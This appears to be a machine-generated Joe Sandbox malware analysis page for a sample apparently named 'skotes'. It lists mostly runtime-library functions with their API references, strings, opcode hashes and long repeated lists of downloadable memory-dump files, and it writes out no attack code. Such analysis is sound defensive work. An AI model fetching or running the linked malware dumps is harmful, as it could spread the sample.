Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 5db5cee17d358c1970f458085ab3339d93ca828a5e5da90b27495502cb7a47a1
Instruction ID: f2b077c748cd64494bcea2e7f0bf344c460d1b4843aa628db5d7eff808bce1a4
Opcode Fuzzy Hash: 5db5cee17d358c1970f458085ab3339d93ca828a5e5da90b27495502cb7a47a1
Instruction Fuzzy Hash: B33181B1E001168BCB15EFAAC8415AEB7F4EF49314B24446FE845E7351DB389E06CBA9

Function 004ACBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004ACC66

Strings

vJ, xrefs: 004ACBE1

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vJ
API String ID: 3213747228-190702178
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 56daa811097e1f2e94d492957541666e5f85402896b33f7f032b7f44b67f54e2
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: EFB1F2329042459FDB158F28C8C17AFBBE5EF66354F14816BD855EB341D6389D02CBA8

Function 004A1B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 004A1B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A1B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A1C2A

Strings

switchState, xrefs: 004A1B5E
pContext, xrefs: 004A1C22

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: 7881c0f1a83b3b7020ac4d3c1c600b371ef347a76029f8c30706464115d8e53d
Instruction ID: 2acaa293ec8e0d37d1df3aea82a751b7e0171e1c07b75fa4fda36384feef7c24
Opcode Fuzzy Hash: 7881c0f1a83b3b7020ac4d3c1c600b371ef347a76029f8c30706464115d8e53d
Instruction Fuzzy Hash: 3931BB35A002149BCF04EF64C481EAE7375FF66324F20456BE911973A2EB78ED05CBA8

Function 004A4E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 004A4E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 004A4E86
PMDtoOffset.LIBCMT ref: 004A4EAC

Strings

Bad dynamic_cast!, xrefs: 004A4EEE

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 6e118ffdf871b938fcc3a3cbf5e0c9a660beec4826bd283b500038fd90bfe21d
Instruction ID: 1f7fa80c775aab9466728ee5590852faff62b5f7e9733411d976aa4077df04c9
Opcode Fuzzy Hash: 6e118ffdf871b938fcc3a3cbf5e0c9a660beec4826bd283b500038fd90bfe21d
Instruction Fuzzy Hash: FA210772600204AFCF14DFA8D906EAF77A4FBE6724B10411FF90097680DBBDE90086A9

Function 004A727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 004A72BE

Strings

.bat, xrefs: 004A72ED
.exe, xrefs: 004A72CB
.com, xrefs: 004A72FE
.cmd, xrefs: 004A72DC

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 696f2c69c972a01a3dde622d56feb3f2fb21b4c62e3375d9bd4eda1631e8fd18
Instruction ID: 376feebb1bc5f81e196bf6d96827c31bb7911eeab115e189a935bace5ca7bd22
Opcode Fuzzy Hash: 696f2c69c972a01a3dde622d56feb3f2fb21b4c62e3375d9bd4eda1631e8fd18
Instruction Fuzzy Hash: FD012F27708612256A345019AD02F6713889BE3BB8B26401FFC54F73C1DF8CDC42A2EC

Function 0048FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0048FB06

Strings

GetCurrentProcessorNumberEx, xrefs: 0048FABE
GetThreadGroupAffinity, xrefs: 0048FA93
SetThreadGroupAffinity, xrefs: 0048FA87
kernel32.dll, xrefs: 0048FA7A

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
